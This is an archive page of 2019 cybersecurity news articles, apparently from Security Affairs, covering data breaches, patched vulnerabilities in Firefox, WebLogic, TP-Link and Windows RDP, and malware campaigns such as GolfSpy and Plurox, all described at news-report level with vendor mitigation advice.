Category Archives: Hacking

Oregon Department of Human Services data breach impacted 645,000 clients

Oregon Department of Human Services announced it was a victim of a data breach in January, roughly 645,000 potentially impacted.

Oregon Department of Human Services officials confirmed that the organization has suffered a data breach that has exposed personal details and health information of 645,000 clients.

The incident happened in January and the Oregon Department of Human Services is notifying the incident to the clients.

“The Oregon Department of Human Services is notifying about 645,000 clients whose personal information is now at risk from a January data breach. State officials announced the notifications on Tuesday. They‘ll will start mailing them on Wednesday.” states the Statesman-Journal.

“Affected people were enrolled in the department’s welfare and children services programs at the time of the breach. Officials said the compromised data includes personal health information, but it’s unknown if was viewed or inappropriately used.”

Oregon Department of Human Services

Individuals impacted by the data breach were enrolled in the department’s welfare and children services programs at the time of the security incident.

“The state is also providing 12 months of identity theft monitoring and recovery services, which includes a $1 million insurance reimbursement policy to impacted individuals.” reads the Associated Press.

The department was hit by a phishing campaign on January 8, 2019, and at least nine employees have been deceived in the attack.

“The breach happened during an email “phishing” attempt that targeted the department Jan. 8. Nine employees opened the email and clicked on a link that gave the perpetrator access to their email accounts.” concludes the AP.

Pierluigi Paganini

(SecurityAffairs – Oregon Department of Human Services, hacking)

The post Oregon Department of Human Services data breach impacted 645,000 clients appeared first on Security Affairs.

Hacking Hardware Security Modules

Security researchers Gabriel Campana and Jean-Baptiste Bédrune are giving a hardware security module (HSM) talk at BlackHat in August:

This highly technical presentation targets an HSM manufactured by a vendor whose solutions are usually found in major banks and large cloud service providers. It will demonstrate several attack paths, some of them allowing unauthenticated attackers to take full control of the HSM. The presented attacks allow retrieving all HSM secrets remotely, including cryptographic keys and administrator credentials. Finally, we exploit a cryptographic bug in the firmware signature verification to upload a modified firmware to the HSM. This firmware includes a persistent backdoor that survives a firmware update.

They have an academic paper in French, and a presentation of the work. Here's a summary in English.

There were plenty of technical challenges to solve along the way, in what was clearly a thorough and professional piece of vulnerability research:

  1. They started by using legitimate SDK access to their test HSM to upload a firmware module that would give them a shell inside the HSM. Note that this SDK access was used to discover the attacks, but is not necessary to exploit them.

  2. They then used the shell to run a fuzzer on the internal implementation of PKCS#11 commands to find reliable, exploitable buffer overflows.

  3. They checked they could exploit these buffer overflows from outside the HSM, i.e. by just calling the PKCS#11 driver from the host machine

  4. They then wrote a payload that would override access control and, via another issue in the HSM, allow them to upload arbitrary (unsigned) firmware. It's important to note that this backdoor is persistent ­ a subsequent update will not fix it.

  5. They then wrote a module that would dump all the HSM secrets, and uploaded it to the HSM.

Tor Browser 8.5.2 fixes Firefox zero-day. Update it now!

Developers at the Tor Project have released the Tor Browser 8.5.2 to address the recently fixed CVE-2019-11707 zero-day flaw in Mozilla Firefox.

Yesterday I reported the news of a critical zero-day in Firefox that was addressed by Mozilla with a new release. The vulnerability, tracked as CVE-2019-11707, is a type confusion flaw in Array.pop. Mozilla has addressed it with the release of Firefox 67.0.3 and Firefox ESR 60.7.1.

The flaw was reported by Coinbase Security and Samuel Groß of Google Project Zero team. Samuel Groß explained that he reported the bug to Mozilla on April 15, 2019.

The researcher explained that the vulnerability could be used for remote code execution if chained with a separate sandbox escape issue.

Developers at the Tor Project have released the Tor Browser 8.5.2 to address the CVE-2019-11707 vulnerability too. It is very important for Tor users to use the updated version of the Tor Browser to protect their anonymity.

This vulnerability did not affect users running under the Safer or Safest security levels.

“This release fixes a critical security update in Firefox. In addition, we update NoScript to 10.6.3, fixing a few issues.” reads the announcement of the Tor Project. “Users of the safer and safest security levels were not affected by this security issue.”

Users can manually check the availability of new updates by going to the Tor Browser menu -> Help -> About Tor Browser.

Tor browser 8.5.2

Mozilla confirmed that threat actors exploited the zero-day in targeted attacks in the wild, the organizations did not provide technical details of the issue.

The DHS’s Cybersecurity and Infrastructure Security Agency (CISA) also issued a short alert for the vulnerability in Mozilla.

The Tor Browser 8.5.2 also includes an updated version of the NoScript addon (ver. 10.6.3.),

Bad news for Android users, the updates for the Android version of the Browser will not be available until the weekend, meantime Android users should use the browser with safer or safest security levels.

“As part of our team is currently traveling to an event, we are unable to access our Android signing token, therefore the Android release is not yet available. We expect to be able to publish the Android release this weekend.” continues the announcemente.

The Tor Browser 8.5.2 can be downloaded from the Tor Browser download page and from the distribution directory.

Below the full changelog for the new version:

Tor Browser 8.5.2 -- June 19 2019
 * All platforms
   * Pick up fix for Mozilla's bug 1544386
   * Update NoScript to 10.6.3
     * Bug 29904: NoScript blocks MP4 on higher security levels
     * Bug 30624+29043+29647: Prevent XSS protection from freezing the browser

Pierluigi Paganini

(SecurityAffairs – Tor, zero-day)

The post Tor Browser 8.5.2 fixes Firefox zero-day. Update it now! appeared first on Security Affairs.

Bouncing Golf cyberespionage campaign targets Android users in Middle East

According to security researchers at Trend Micro, a cyberespionage campaign is targeting Android users in Middle Eastern countries.

Security researchers at Trend Micro have spotted a cyberespionage campaign, dubbed ‘Bouncing Golf, that is targeting Android users in Middle Eastern countries.

Threat actors are using a piece of malware detected as GolfSpy, that implements multiple features and can hijack the victim’s device.

GolfSpy could steal the following information:

  • Device accounts
  • List of applications installed in the device
  • Device’s current running processes
  • Battery status
  • Bookmarks/Histories of the device’s default browser
  • Call logs and records
  • Clipboard contents
  • Contacts, including those in VCard format
  • Mobile operator information
  • Files stored on SDcard
  • Device location
  • List of image, audio, and video files stored on the device
  • Storage and memory information
  • Connection information
  • Sensor information
  • SMS messages
  • Pictures

Attackers distributed the malware in tainted legitimate applications that are hosted on websites advertised on social media. The tainted applications pose as communication, news, lifestyle, book, and reference apps that are commonly used in the Middle East.

“We uncovered a cyberespionage campaign targeting Middle Eastern countries. We named this campaign “Bouncing Golf” based on the malware’s code in the package named “golf.”” reads the blog post published by Trend Micro. “The malware involved, which Trend Micro detects as  AndroidOS_GolfSpy.HRX, is notable for its wide range of cyberespionage capabilities. Malicious codes are embedded in apps that the operators repackaged from legitimate applications.”

According to the experts that have analyzed the command and control (C&C) servers used in the Bouncing Golf campaign, more than 660 Android devices have been infected with GolfSpy malware. The attackers appear to be focused on stealing military-related information.

The researchers speculate on a possible connection to Domestic Kitten espionage activities, an extensive surveillance operation conducted by Iranian APT actor aimed at specific groups of individuals since 2016.

Experts found some similarities between the similarly structured strings of code and the format of the data targeted for theft.

bouncing golf golfspy

The GolfSpy malware is also able to connect to a remote server to fetch and perform a broad range of commands such as searching for/listing/deleting/renaming files, downloading/uploading files to/from the device, taking screenshots, installing application packages (APK), recording audio and video, and updating the malware.

Once the malware is executed, it generates a unique ID and then collects targeted data and writes it to a file on the mobile device.

The malicious code allows the attackers to choose the data types to collect, stolen data is encrypted using a simple XOR operation with a pre-configured key, then it is sent to the C2 via HTTP POST requests.

GolfSpy also connects C2 via a socket in order to receive additional commands. In this case, stolen data is also sent to the C2 in encrypted forms via the socket, experts pointed out that the encryption key is different from the one used when data is sent via HTTP.

The operators behind the Bouncing Golf campaign attempt to cover their tracks, for example, they masked the registrant contact details of the C&C domains used in the campaign. The IP addresses associated with the C&C servers used in the campaign also appear to be located in many European countries, including Russia, France, Holland, and Germany.

“As we’ve seen in last year’s mobile threat landscape, we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity, employing tried-and-tested techniques to lure unwitting users.” Trend Micro concludes. “The extent of information that these kinds of threats can steal is also significant, as it lets attackers virtually take over a compromised device,”

Pierluigi Paganini

(SecurityAffairs – Bouncing Golf, hacking)

The post Bouncing Golf cyberespionage campaign targets Android users in Middle East appeared first on Security Affairs.

AMCA files for bankruptcy following the recently disclosed security breach

Retrieval-Masters Creditors Bureau, the company that operates healthcare billing services provider AMCA, has filed for Chapter 11 bankruptcy due to a recent data breach.

Retrieval-Masters Creditors Bureau, the company that operates the recovery agency for patient collections American Medical Collection Agency (AMCA), has filed for Chapter 11 bankruptcy due to a recent security breach that affected millions of individuals.

The company Retrieval-Masters Creditors Bureau would pay millions of dollars for the incident response, for this reason, it has decided to terminate AMCA.

The news is disconcerting and demonstrates the potential effects of a data breach on an organization.

The incident impacted millions of users, a filing with the U.S. Securities and Exchange Commission (SEC) Quest revealed that the attackers broke into the web payment portal of the American Medical Collection Agency between August 1, 2018 and March 30, 2019.

AMCA provides services to numerous firms, including the revenue cycle management provider Optum360, medical testing firm Quest Diagnostics, and LabCorp.

AMCA databreach

The security breach has impacted roughly 12 million of Quest Diagnostics‘ patients and roughly 7.7 of LabCorp patients. After the disclosure of the incident, Labcorp announced the terminations of business activities with AMCA and Quest Diagnostics has suspended sending collection requests to AMCA.

The hackers broke into company databases containing millions of medical test lab patients’ personal and payment information.

Other 422,000 patients of BioReference Laboratories, roughly 500,000 patients of CareCentrix, and customers of Sunrise Laboratories were also impacted by the security breach.

AMCA is in the storm, several class action lawsuits have been filed against it, and the number of potentially affected people continue to grow.

According to documents submitted to the U.S. Bankruptcy Court in the Southern District of New York, many payment cards used on the AMCA web site had been used for fraudulent charges.

The investigation into the incident has cost AMCA roughly $400,000 and it has been estimated that the company will spend another $3.8 million to send millions of notices to impacted individuals.

Pierluigi Paganini

(SecurityAffairs – AMCA, hacking)

The post AMCA files for bankruptcy following the recently disclosed security breach appeared first on Security Affairs.

Another Remote Code Execution flaw in WebLogic exploited in the wild

Oracle released emergency patches for another critical remote code execution vulnerability affecting WebLogic Server.

On Tuesday, Oracle released emergency patches for another critical remote code execution vulnerability affecting the WebLogic Server.

The vulnerability, tracked as CVE-2019-2729, affects WebLogic versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. The vulnerability is a remotely exploitable deserialization vulnerability via XMLDecoder in Oracle WebLogic Server Web Services, it received a CVSS score of 9.8.

A remote attacker could exploit the CVE-2019-2729 flaw without authentication. The issue was independently reported to Oracle by many security researchers.

“This Security Alert addresses CVE-2019-2729, a deserialization vulnerability via XMLDecoder in Oracle WebLogic Server Web Services. This remote code execution vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.” reads the security advisory published by Oracle.

“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.”

Oracle WebLogic flaw

Oracle urges its users to apply the necessary patches and also the latest Critical Patch Update (CPU).

John Heimann, VP of Security Program Management at Oracle, pointed out that the CVE-2019-2729 is different from the recently discovered CVE-2019-2725 that was exploited in cryptojacking campaigns and in hacking campaigns spreading the Sodinokibi ransomware.

“Please note that while the issue addressed by this alert is a deserialization vulnerability, like that addressed in Security Alert CVE-2019-2725, it is a distinct vulnerability.” wrote Heimann.

“Due to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible.”

According to the experts at Knownsec 404 Team who also reported the flaw, the CVE-2019-2729 is actually the result of an uncomplete patch for CVE-2019-2725. Knownsec 404 Team confirmed that threat actors are already exploiting the CVE-2019-2729 in the wild.

“Then today, a new oracle webLogic deserialization RCE 0day vulnerability was found and is being actively used in the wild.We analyzed and reproduced the 0day vulnerability, which is based on and bypasses the patch for CVE-2019–2725.” reads a post published by Knownsec 404 Team.

Knownsec 404 Team provided the following temporary solutions:

  • Scenario-1: Find and delete wls9_async_response.war, wls-wsat.war and restart the Weblogic service.
  • Scenario-2: Controls URL access for the /_async/* and /wls-wsat/* paths by access policy control.

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2729, hacking)

The post Another Remote Code Execution flaw in WebLogic exploited in the wild appeared first on Security Affairs.

Mozilla fixed a Firefox Zero-Day flaw exploited in targeted attacks

Mozilla released security updates for Firefox that addressed a critical zero-day vulnerability exploited in targeted attacks in the wild.

Mozilla released security updates for its Firefox web browser that address a critical vulnerability that has been actively exploited in the wild.

The zero-day vulnerability, tracked as CVE-2019-11707, is a type confusion flaw in Array.pop. Mozilla has addressed it with the release of Firefox 67.0.3 and Firefox ESR 60.7.1.

“A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw.” reads the security advisory published by Mozilla.

mozilla firefox zero-day

The flaw was reported by Coinbase Security and Samuel Groß of Google Project Zero team. Samuel Groß explained that he reported the bug to Mozilla on April 15, 2019.

The researcher explained that the vulnerability could be used for remote code execution if chained with a separate sandbox escape issue.

Mozilla confirmed that threat actors exploited the zero-day in targeted attacks in the wild, the organizations did not provide technical details of the issue.

The DHS’s Cybersecurity and Infrastructure Security Agency (CISA) also issued a short alert for the vulnerability in Mozilla.

“Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system.” states the alert. “This vulnerability was detected in exploits in the wild.”

In 2016, security researchers found a malicious script that exploited another Firefox Zero-day to identify some users of the Tor anonymity network.

Pierluigi Paganini

(SecurityAffairs – Mozilla Firefox zero-day, hacking)

The post Mozilla fixed a Firefox Zero-Day flaw exploited in targeted attacks appeared first on Security Affairs.

Eatstreet, the online food ordering service disclosed a security breach

Eatstreet, the online food ordering service, disclosed a security breach that exposed customer payment card data and details of partners

EatStreet, an online and mobile food ordering service, disclosed a security breach that exposed customer payment card data and details of delivery and restaurant partners

Attackers breached the company network on May 3 stole data from its database. On May 17, the company discovered the intrusion and locked out the attacker.

Stolen data includes names, addresses, phone numbers, email addresses, as well as financial data (i.e. bank accounts, routing numbers, credit card numbers, expiration dates and card verification codes), billing addresses)..

“On May 3, 2019, an unauthorized third party gained access to our database, which we discovered on May 17, 2019. The unauthorized third party was able to acquire information that was in our database on May 3, 2019. We were able, however, to promptly terminate the unauthorized access to our systems when we discovered the incident.” reads the data breach notification letter sent to delivery and restaurant partners.

eatstreet

EatStreet currently offers its services to “over 15,000 restaurants in more than 1,100 cities,” the company’s Android app has over 100,000 installs as of June 5.

EatStreet promptly alerted the credit card payment processors and “hired a leading external IT forensics firm to respond to and investigate the incident. We audited our systems to validate that there was no other unauthorized access.”

At the time, law enforcement agencies are not investigating the incident:

“EatStreet continues to work with outside experts to identify other measures it can take to improve its security controls. While our investigation is ongoing, there was no law enforcement investigation that delayed notification to you.”

“In addition, we have enhanced the security of our systems, including reinforcing multi-factor authentication, rotating credential keys and reviewing and updating coding practices,”

According to ZDNet, the hacker who breached the company is Gnosticplayers, who made the headlines because between February and April disclosed the existence of some massive unreported data breaches in fifth rounds. The list of victims includes Canva, 500px, UnderArmor, ShareThis, GfyCat, Ge.tt, Evite, and others.

The hacker took credit for the data breach while discussing with ZDNet about the Canva hack allegations last month.

At the time it is not clear the extent of the security breach, but the hacker claimed he stole over six million user records.

“In an email to ZDNet today, the hacker claimed he was in the possession of over six million user records he took from the company’s servers. Over the past few months, this hacker has stolen and put up for sale 1,071 billion user credentials from 45 companies. “

Pierluigi Paganini

(SecurityAffairs – EatStreet, hacking)


The post Eatstreet, the online food ordering service disclosed a security breach appeared first on Security Affairs.

Modular Plurox backdoor can spread over local network

Kaspersky experts recently discovered a backdoor dubbed Plurox that can spread itself over a local network and can allow installing additional malware. 

Kaspersky experts discovered the Plurox backdoor in February, it can spread itself over a local network and could be used by attackers to install additional malware. 

The Plurox backdoor is written in C and compiled with Mingw GCC, it communicates with the command and control (C&C) server using the TCP protocol. The malware has a modular structure, it uses a variety of plugins to implements its functionalities. 

“The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers.” reads the analysis published by Kaspersky. “What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.”

The analysis of the code revealed the presence of debug lines, a circumstance that suggests the malware was at the testing stage when it was first spotted.

The Plurox backdoor uses two different ports to load plugins, the ports along with the C&C addresses are hardcoded into the source code of the malware. 

Monitoring the backdoor’s activity, experts discovered two “subnets.” One subnet is used to provide only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) to the Plurox backdoor. The other one, besides miners (auto_opencl_amd, auto_miner), is used to pass several plugins to the malware.

The Plurox backdoor supports the following commands:

  • Download and run files using WinAPI CreateProcess
  • Update bot
  • Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
  • Download and run plugin
  • Stop plugin
  • Update plugin (stop process and delete file of old version, load and start new one)
  • Stop and delete plugin

The backdoor allows delivering the proper cryptocurrency miners depending on the system configuration.  

The researchers observed eight mining modules that were used to infect systems running on different processors: auto_proc, auto_cuda, auto_miner, auto_opencl_amd, auto_gpu_intel, auto_gpu_nvidia, auto_gpu_cuda, and auto_gpu_amd. 

Experts also discovered that the Plurox backdoor also supports a UPnP plugin designed to target a local network. 

“The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network. ” states the report.

In case the administrators will detect the attack on the host, they will see the attack coming directly from the router, not from a local machine.

The UPnP plugin is similar to the EternalSilence exploit, with the difference that Plurox forwards TCP port 135 instead of 139. 

The backdoor uses the SMB plugin for spreading over the network using the EternalBlue exploit.

The module borrows the code from the Trickster Trojan, the researchers believe that the authors of Plurox and Trickster may be linked.

Plurox

Further technical details, including IoCs are reported in the analysis published by Kaspersky.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post Modular Plurox backdoor can spread over local network appeared first on Security Affairs.

Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group

The head of London’s Serpentine Galleries resigned on Tuesday following a Guardian report about her links to the Israeli surveillance firm NSO Group.

On Tuesday, the chief executive of London’s Serpentine Galleries, Yana Peel, resigned following the revelation of the Guardian newspaper about her links to the Israeli surveillance firm NSO Group.

According to the newspaper, Yana Peel is the co-owner of the controversial Israeli company. The board of trustees of the galleries has accepted Peel’s resignation.

“The head of the Serpentine Galleries has resigned after the Guardian revealed she is the co-owner of an Israeli cyberweapons company whose software has allegedly been used by authoritarian regimes to spy on dissidents.” reads the post published by the Guardian.

“On Tuesday, Yana Peel announced she was stepping down as the chief executive of the prestigious London art gallery so the work of the Serpentine would not be undermined by what she called“misguided personal attacks on me and my family”.

Last week, the Guardian revealed that Yana Peel is one of the owners of the private equity firm Novalpina Capital, co-founded by Peel’s husband, Stephen, that has the majority of the shares in NSO Group.

“I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role.” Peel said

The principal product of the NSO Group is a surveillance software called Pegasus, it allows to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.

NSO Group Pegasus spyware

Pegasus is a perfect tool for surveillance, it is able to steal any kind of data from smartphones and use them to spy on the surrounding environment through their camera and microphone.

The NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigations of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International was corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.

Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

“The work of the Serpentine – and its incomparable artistic director – cannot be allowed to be undermined by misguided personal attacks on me and my family. These attacks are based upon inaccurate media reports now subject to legal complaints.” Peel said. “I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role,” it continued.” 

Pierluigi Paganini

(SecurityAffairs – NSO group, Surveillence)

The post Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group appeared first on Security Affairs.

Android Apps uses a novel technique to by-pass 2FA and steal Bitcoin

Expert discovered a new technique bypassing SMS-based two-factor authentication while circumventing Google’s recent SMS permissions restrictions

The popular security expert Lukas Stefanko from ESET discovered some apps (namedBTCTurk Pro Beta and BtcTurk Pro Beta) impersonating the Turkish cryptocurrency exchange, BtcTurk, in the attempt of stealing login credentials.

by-pass 2FA and steal Bitcoin

In order to steal the 2FA OTPs the apps read the credentials that appear in 2FA notifications from the service, instead of intercepting the SMS messages delivering them,

Stefanko explained that the new increasing interest in Bitcoin is associated with the growth of its price.

“When Google restricted the use of SMS and Call Log permissions in Android apps in March 2019, one of the positive effects was that credential-stealing apps lost the option to abuse these permissions for bypassing SMS-based two-factor authentication (2FA) mechanisms.” wrote the expert.

“We have now discovered malicious apps capable of accessing one-time passwords (OTPs) in SMS 2FA messages without using SMS permissions, circumventing Google’s recent restrictions.”

When the apps are executed for the first time they request ‘notification access’ permission that is used to read the notifications displayed by other apps installed on the device, dismiss those notifications, or click buttons they contain.

Once the permission is granted to the apps, they will display a fake login message asking for the user’s BtcTurk login credentials. Once the users will provide the credentials, the apps display a false error message.

“Opss! Due to the change made in the SMS Verification system, we are temporarily unable to service our mobile application. After the maintenance work, you will be notified via the application. Thank you for your understanding.” reads the message (Translated from Turkish).

In the meantime, the login credentials for the services are sent back to the attacker’s server. 

At this point, the rogue apps leverage the notifications access permission to read all incoming notifications and select the ones related to applications of interest. The apps read the notifications associated with apps whose names contain the keywords, gm, yandex, mail, k9, outlook, SMS, and messaging. These notifications are sent to the attacker, who select the ones containing the one-time passwords used in 2FA.

“The displayed content of all notifications from the targeted apps is sent to the attacker’s server. The content can be accessed by the attackers regardless of the settings the victim uses for displaying notifications on the lock screen. The attackers behind this app can also dismiss incoming notifications and set the device’s ringer mode to silent, which can prevent victims from noticing fraudulent transactions happening.” continues the expert.

At this point, it is easy for the attackers to impersonate the victims while attempt to access the services. Any 2FA OTP can be dismissed from the victim’s phone and sent to the attacker, the attacker with this scheme has access to login credentials and OTP and can use them to access the account.

Experts at ESET are warning of the rapid spread of this technique that was recently observed in attacks against users of the Turkish Koineks exchange. ESET believes that the threat actor behind the attacks was the same.

“Just last week, we analyzed a malicious app impersonating the Turkish cryptocurrency exchange Koineks(kudos to @DjoNn35 for bringing that app to our attention). It is of interest that the fake Koineks app uses the same malicious technique to bypass SMS and email-based 2FA but lacks the ability to dismiss and silence notifications.”

“According to our analysis, it was created by the same attacker as the “BTCTurk Pro Beta” app analyzed in this blogpost. This shows that attackers are currently working on tuning this technique to achieve the “next best” results to stealing SMS messages.”

Experts believe that crooks will start using this technique against target in other industries, including banks and financial institutions.

Pierluigi Paganini

(SecurityAffairs – SFA, hacking)

The post Android Apps uses a novel technique to by-pass 2FA and steal Bitcoin appeared first on Security Affairs.

Expert found a critical RCE zero-day in TP-Link Wi-Fi Extenders

A zero-day vulnerability affects multiple models of TP-Link Wi-Fi extenders, it could be exploited to remotely execute code.

Security expert Grzegorz Wypych from IBM X-Force found a zero-day flaw that affects multiple models of TP-Link Wi-Fi extenders.

The Wi-Fi extenders capture the Wi-Fi signal from the main network device and rebroadcast it to areas where the signal is weak.

RE365 TP-Link Wi-Fi extenders

The vulnerability discovered by the expert could be exploited to remotely execute code on vulnerable devices and get complete control over the device and command it with the same privileges of the device’s legitimate user.

“As part of a recent series of vulnerabilities discovered in home routers, IBM X-Force researcher Grzegorz Wypych discovered a zero-day flaw in a TP-Link Wi-Fi extender.” reads the advisory published by IBM. “If exploited, this remote code execution (RCE) vulnerability can allow arbitrary command execution via a malformed user agent field in HTTP headers.”

The RCE flaw affects TP-Link Wi-Fi Extender models RE365, RE650, RE350 and RE500 running firmware version 1.0.2, build 20180213.

The flaw could be exploited by an unauthenticated remote attacker, the attack doesn’t require privilege escalation since all processes on the vulnerable devices already run with root-level access.

The extender operates on the MIPS architecture, like many routers, the zero-day flaw can be triggered

TP-Link’s Wi-Fi extenders operate on MIPS architecture and the vulnerability can be triggered by sending a malformed HTTP request.

The HTTP request that can allow the execution of any shell command on the targeted RE365 Wi-Fi extender.

“The following image shows an open telnet session from a fully compromised device. After connecting to TCP port 4444 we were able to obtain root level shell on the Wi-Fi extender without any privilege escalation, with all processes running as root.” continues the analysis.

TP-Link Wi-Fi extenders

“The sort of impact one can expect from such unauthenticated access is, for example, requesting the device to browse to a botnet command and control server or an infection zone,”

The experts warn of the risks of massive attacks on IoT devices carried out thought Mirai-like bots.

TP-Link already released security patches to address the zero-day flaw, the vendor published separated updates for each of the impacted models of Wi-Fi extenders (RE365RE500RE650RE350).

Pierluigi Paganini

(SecurityAffairs – TP-Link Wi-Fi extenders, hacking)

The post Expert found a critical RCE zero-day in TP-Link Wi-Fi Extenders appeared first on Security Affairs.

DHS also issued an alert for the Windows BlueKeep flaw

The Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. DHS on Monday issued an alert for the BlueKeep Windows flaw (CVE-2019-0708).

After Microsoft and the US NSA, the Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. DHS on Monday issued an alert for the BlueKeep Windows flaw (CVE-2019-0708).

Experts at the CISA Agency successfully exploited the BlueKeep flaw on a machine running Windows 2000. The agency urges Microsoft users and administrators to install security patches, disable unnecessary services, enable Network Level Authentication (NLA) if available, and block TCP port 3389.

Below an excerpt from the security advisory:

“CISA encourages users and administrators review the Microsoft Security Advisory [3] and the Microsoft Customer Guidance for CVE-2019-0708 [4] and apply the appropriate mitigation measures as soon as possible:

  • Install available patches. Microsoft has released security updates to patch this vulnerability. Microsoft has also released patches for a number of OSs that are no longer officially supported, including Windows Vista, Windows XP, and Windows Server 2003. As always, CISA encourages users and administrators to test patches before installation.”

For OSs that do not have patches or systems that cannot be patched, other mitigation steps can be used to help protect against BlueKeep:

  • Upgrade end-of-life (EOL) OSs. Consider upgrading any EOL OSs no longer supported by Microsoft to a newer, supported OS, such as Windows 10.
  • Disable unnecessary services. Disable services not being used by the OS. This best practice limits exposure to vulnerabilities.  
  • Enable Network Level Authentication. Enable Network Level Authentication in Windows 7, Windows Server 2008, and Windows Server 2008 R2. Doing so forces a session request to be authenticated and effectively mitigates against BlueKeep, as exploit of the vulnerability requires an unauthenticated session.
  • Block Transmission Control Protocol (TCP) port 3389 at the enterprise perimeter firewall. Because port 3389 is used to initiate an RDP session, blocking it prevents an attacker from exploiting BlueKeep from outside the user’s network. However, this will block legitimate RDP sessions and may not prevent unauthenticated sessions from being initiated inside a network.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Experts believe that it just a matter of time before we will see threat actors exploiting the flaw in the wild.

“Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator,” reads the post published by ESET.

BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.”

It has been estimated that roughly one million devices are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.

Most of the vulnerable systems are in China, followed by the United States.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Don’t waste time, patch your system!

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post DHS also issued an alert for the Windows BlueKeep flaw appeared first on Security Affairs.

Multiple DoS vulnerabilities affect Linux and FreeBSD

Netflix researcher has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels that could trigger a DoS condition.

Jonathan Looney, a security expert at Netflix, found three Linux DoS vulnerabilities, two of them related to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities, and one related only to MSS.

The most severe flaw, tracked as SACK Panic, could be exploited to remotely trigger a DOS condition and reboot vulnerable systems. The kernel panic flaw affects recent Linux kernels.

“Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels.” reads the security advisory. “The vulnerabilities specifically relate to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities.”

The denial of service flaw SACK Panic was tracked as CVE-2019-11477 and was rated as important severity, it received a 7.5 CVSS3 base score,  

“Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels.” reads the Netflix’s NFLX-2019-001 security advisory.

“The vulnerabilities specifically relate to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. The most serious, dubbed “SACK Panic,” allows a remotely-triggered kernel panic on recent Linux kernels.

There are patches that address most of these vulnerabilities. If patches can not be applied, certain mitigations will be effective. We recommend that affected parties enact one of those described below, based on their environment.”

The SACK Panic vulnerability affects Linux kernels 2.6.29 and later, an attacker could exploit it by sending a crafted sequence of SACK segments on a TCP connection with a small value of TCP MSS that will trigger an integer overflow leading to a kernel panic.

“Apply the patch PATCH_net_1_4.patch. Additionally, versions of the Linux kernel up to, and including, 4.14 require a second patch PATCH_net_1a.patch,” continues Netflix Information Security’s advisory.

Below the advisories published by major Linux distros and cloud service providers:

The good news for Linux users is that most of the issues found by Netflix were already addressed with security patches. Mitigations are also available for those systems that cannot be immediately patched.

Users and administrator can mitigate the flaw by completely disabling SACK processing on the system or blocking connections with a low MSS. Netflix Information Security provided a series of filters to block the connections. Another mitigation consists of disabling TCP probing.

The remaining issued were respectively tracked as CVE-2019-11478 and CVE-2019-11479, both were rated as moderate severity vulnerabilities. The flaws affect all Linux versions. The CVE-2019-11478 issue could be exploitable by sending a crafted sequence of SACKs which will fragment the TCP retransmission queue. The CVE-2019-11479 issue could be exploited by attackers to trigger a DoS state by sending crafted packets with low MSS values to trigger excessive resource consumption.

